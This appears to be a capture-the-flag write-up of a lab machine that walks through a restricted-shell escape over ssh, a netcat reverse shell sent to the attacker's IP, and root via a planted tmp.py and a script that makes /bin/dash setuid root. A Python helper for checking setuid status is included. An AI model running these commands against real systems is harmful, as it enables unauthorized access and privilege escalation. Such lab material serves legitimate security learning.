When I first logged in, the account had a restricted shell, so I used the trick below to get an unrestricted one:
ssh mindy@10.129.29.189 -t "bash --noprofile"
According to the ssh manual page:

    -t  Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.

So -t gives us a proper tty, and --noprofile makes bash start without reading the login profile files, which is where a restricted environment is usually set up.
Now I can see the other files.

Let's see if we can get a reverse shell back to my machine (with a listener waiting there, e.g. nc -lvnp 1234):

nc -e /bin/bash 10.10.14.131 1234

It worked!
Let's plug this command into tmp.py. I waited for about a minute, and I got a root shell!
Another way to get root:
#!/usr/bin/env python
import os
import sys

# Make /bin/dash setuid root: 4 = setuid bit, 755 = the usual perms for a binary.
# This only has an effect when the script itself runs as root.
# os.system() does not raise on failure, it returns the exit status, so check that.
status = os.system("chmod 4755 /bin/dash")
if status != 0:
    sys.exit(1)
4 -> the setuid bit; 755 -> the default permissions for most binaries.
dash -> another shell. Unlike bash, it does not drop the elevated effective UID when it is started from a setuid binary (bash resets the effective UID to the real UID unless run with -p), which is why /bin/dash is the target rather than /bin/bash.
So if we can get the SUID bit set on it (by something running as root) and then execute it, we escalate privilege.
Once "ls -l /bin/dash" shows the permissions have changed to -rwsr-xr-x, type "dash" to call the executable and confirm with "id" that the effective uid is 0.
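To make the "-rwsr" check and the dash-versus-bash point concrete, here is an added Python 3 example (my code, not part of the original writeup). It checks a path for the setuid bit and root ownership the same way ls -l does, returns the command line that keeps the effective uid for the shell in question, and uses scratch files it creates itself (make_demo_file, an assumed helper) so it can be run without root:

```python
#!/usr/bin/env python3
"""Added example: verify a binary is setuid-root before relying on it.

Not from the original writeup. Uses only the standard library; the demo files
it creates are constructed sample input so the checks can run unprivileged.
"""
import os
import stat
import tempfile


def describe_mode(path):
    """Return the ls -l style mode string for path, e.g. '-rwsr-xr-x'."""
    return stat.filemode(os.stat(path).st_mode)


def owner_uid(path):
    """Numeric uid of the file owner."""
    return os.stat(path).st_uid


def setuid_bit_set(path):
    """True if the setuid bit (the 4 in 4755) is set on path."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def is_setuid_root(path):
    """True if path is a regular file, owned by uid 0, setuid, and executable
    by others. That is the condition under which running it yields euid 0.
    Caveat: the kernel ignores the bit on filesystems mounted nosuid, which a
    stat-based check cannot see."""
    st = os.stat(path)
    return (stat.S_ISREG(st.st_mode)
            and st.st_uid == 0
            and bool(st.st_mode & stat.S_ISUID)
            and bool(st.st_mode & stat.S_IXOTH))


def shell_command(path):
    """Command line that keeps the elevated effective uid.

    bash resets euid to the real uid when they differ unless started with -p;
    dash (and sh) keep it, which is why the writeup targets /bin/dash."""
    if os.path.basename(path) == "bash":
        return [path, "-p"]
    return [path]


def make_demo_file(mode):
    """Create a scratch file with the given mode (constructed sample input)."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    # On a real box: confirm the chmod took effect before trying the shell.
    for target in ("/bin/dash", "/bin/bash"):
        if os.path.exists(target):
            print(target, describe_mode(target),
                  "setuid-root:", is_setuid_root(target),
                  "run as:", " ".join(shell_command(target)))
```

On the target, is_setuid_root("/bin/dash") flipping to True after tmp.py has run is the signal to type dash; if the only setuid shell available were bash, shell_command shows the -p flag you would need instead.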